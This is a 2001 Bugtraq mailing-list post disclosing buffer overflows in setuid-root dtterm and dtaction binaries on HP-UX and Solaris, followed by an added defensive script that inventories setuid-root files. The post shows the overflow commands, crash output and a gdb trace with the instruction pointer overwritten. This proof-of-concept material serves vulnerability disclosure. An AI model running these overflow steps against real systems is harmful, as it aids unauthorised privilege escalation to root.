Bugtraq mailing list archives
Re: OpenUNIX 8 & Unixware possible local root
From: ARAI Yuu <y.arai () lac co jp>
Date: Thu, 04 Oct 2001 22:20:44 +0900
Hi there,

This also works on HP-UX:

======================================================================
# uname -a
HP-UX moon B.11.00 (snip)
# ls -l /usr/dt/bin/dtterm
-r-sr-xr-x 1 root bin 65536 May 26 1999 /usr/dt/bin/dtterm
# /usr/dt/bin/dtterm -tn `perl -e 'print "A"x1083'`
Memory fault(coredump)

# uname -a
HP-UX moon B.10.20 A 9000/785 (snip)
# ls -l /usr/dt/bin/dtterm
-r-sr-xr-x 1 root bin 53248 May 11 1999 /usr/dt/bin/dtterm
# /usr/dt/bin/dtterm -tn `perl -e 'print "A"x1083'`
Memory fault(coredump)
======================================================================

And we noticed /usr/dt/bin/dtaction on Solaris 8 and HP-UX 10.20 will cause buffer overflow:

======================================================================
(SPARC/Solaris 8)
# uname -a
SunOS unknown 5.8 Generic_108528-10 sun4u sparc SUNW,Sun-Blade-100
# ls -la /usr/dt/bin/dtaction
-r-sr-sr-x 1 root sys 22808 Dec 2 1999 /usr/dt/bin/dtaction
# /usr/dt/bin/dtaction -tn `perl -e 'print "A"x1024'`
Segmentation Fault

(intel/Solaris 8)
# uname -a
SunOS unknown 5.8 Generic_108529-09 i86pc i386 i86pc
# ls -la /usr/dt/bin/dtaction
-r-sr-sr-x 1 root sys 22496 Dec 2 1999 /usr/dt/bin/dtaction
# /usr/dt/bin/dtaction -tn `perl -e 'print "A"x1024'`
Segmentation Fault
# gdb /usr/dt/bin/dtaction --core=core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-pc-solaris2.8"...
(no debugging symbols found)...
Core was generated by `./dtaction -tn AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation Fault.
Reading symbols from /usr/dt/lib/libDtSvc.so.1...
(no debugging symbols found)...done.
Loaded symbols for /usr/dt/lib/libDtSvc.so.1
Reading symbols from /usr/dt/lib/libXm.so.4...(no debugging symbols found)...
done.
Loaded symbols for /usr/dt/lib/libXm.so.4
Reading symbols from /usr/openwin/lib/libXt.so.4...
(no debugging symbols found)...done.
Loaded symbols for /usr/openwin/lib/libXt.so.4
Reading symbols from /usr/openwin/lib/libX11.so.4...
(no debugging symbols found)...done.
Loaded symbols for /usr/openwin/lib/libX11.so.4
Reading symbols from /usr/dt/lib/libSDtFwa.so.1...
(no debugging symbols found)...done.
Loaded symbols for /usr/dt/lib/libSDtFwa.so.1
Reading symbols from /usr/lib/libc.so.1...(no debugging symbols found)...done.
Loaded symbols for /usr/lib/libc.so.1
Reading symbols from /usr/dt/lib/libtt.so.2...(no debugging symbols found)...
---Type <return> to continue, or q <return> to quit---
done.
Loaded symbols for /usr/dt/lib/libtt.so.2
Reading symbols from /usr/lib/libsocket.so.1...(no debugging symbols found)...
done.
Loaded symbols for /usr/lib/libsocket.so.1
Reading symbols from /usr/lib/libnsl.so.1...(no debugging symbols found)...
done.
Loaded symbols for /usr/lib/libnsl.so.1
Reading symbols from /usr/lib/libdl.so.1...(no debugging symbols found)...done.
Loaded symbols for /usr/lib/libdl.so.1
Reading symbols from /usr/lib/libgen.so.1...(no debugging symbols found)...
done.
Loaded symbols for /usr/lib/libgen.so.1
Reading symbols from /usr/openwin/lib/libSM.so.6...
(no debugging symbols found)...done.
Loaded symbols for /usr/openwin/lib/libSM.so.6
Reading symbols from /usr/openwin/lib/libICE.so.6...
(no debugging symbols found)...done.
Loaded symbols for /usr/openwin/lib/libICE.so.6
Reading symbols from /usr/openwin/lib/libXext.so.0...
(no debugging symbols found)...done.
Loaded symbols for /usr/openwin/lib/libXext.so.0
Reading symbols from /usr/lib/libmp.so.2...(no debugging symbols found)...done.
Loaded symbols for /usr/lib/libmp.so.2
Reading symbols from /usr/openwin/lib/libdga.so.1...
(no debugging symbols found)...done.
Loaded symbols for /usr/openwin/lib/libdga.so.1
Reading symbols from /usr/lib//liblayout.so...(no debugging symbols found)...
done.
Loaded symbols for /usr/lib//liblayout.so
Reading symbols from /usr/lib/nss_files.so.1...(no debugging symbols found)...
done.
Loaded symbols for /usr/lib/nss_files.so.1
#0 0xdf004141 in ?? ()
(gdb) bt
#0 0xdf004141 in ?? ()
Cannot access memory at address 0x41414141

(HP-UX 10.20)
# uname -a
HP-UX moon B.10.20 A 9000/785 (snip)
# ls -l /usr/dt/bin/dtaction
-r-sr-sr-x 1 root sys 45056 Feb 5 1999 /usr/dt/bin/dtaction
# /usr/dt/bin/dtaction -tn `perl -e 'print "A"x1083'`
Memory fault(coredump)
#

These /usr/dt/bin/dtaction are installed as SUID root.
Therefore, it might be possible to gain root privilege.

Regards,
-----------------------------------------------
ARAI Yuu <y.arai () lac co jp>
Network Security Specialist / LAC Computer Security Laboratory
http://www.lac.co.jp/security/
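
The report's risk comes from the setuid-root mode bits visible in its `ls -l` listings, so an administrator's first step is to inventory which binaries carry them. The following is an added example, not part of the original message: the function names and the default directory argument are hypothetical, and the sample input is the five listings quoted in the message.

```shell
#!/bin/sh
# Added example (not from the original post): inventory setuid-root binaries.
# Function names and the default directory are hypothetical choices.

# Read `ls -l` lines on stdin; print "path mode tag" for regular files whose
# owner-execute slot is s/S (setuid) and whose owner is root. The tag also
# notes setgid. Paths containing spaces are not handled by this field split.
suid_root_from_ls() {
    awk '
        $1 ~ /^-/ && NF >= 9 {
            suid = (substr($1, 4, 1) ~ /[sS]/)   # owner-execute position
            sgid = (substr($1, 7, 1) ~ /[sS]/)   # group-execute position
            if (suid && $3 == "root")
                printf "%s %s setuid-root%s\n", $NF, $1,
                       (sgid ? "+setgid-" $4 : "")
        }'
}

# Live check on a host: list regular files under a directory that are owned
# by root and carry the setuid bit (octal 4000).
audit_dir() {
    find "${1:-/usr/dt/bin}" -type f -user root -perm -4000 -print 2>/dev/null
}

# The five `ls -l` listings quoted in the message, fed through the parser.
sample_report() {
    suid_root_from_ls <<'EOF'
-r-sr-xr-x 1 root bin 65536 May 26 1999 /usr/dt/bin/dtterm
-r-sr-xr-x 1 root bin 53248 May 11 1999 /usr/dt/bin/dtterm
-r-sr-sr-x 1 root sys 22808 Dec 2 1999 /usr/dt/bin/dtaction
-r-sr-sr-x 1 root sys 22496 Dec 2 1999 /usr/dt/bin/dtaction
-r-sr-sr-x 1 root sys 45056 Feb 5 1999 /usr/dt/bin/dtaction
EOF
}

sample_report
```

`suid_root_from_ls` suits listings collected from several hosts into one file, while `audit_dir` runs directly on the host being checked.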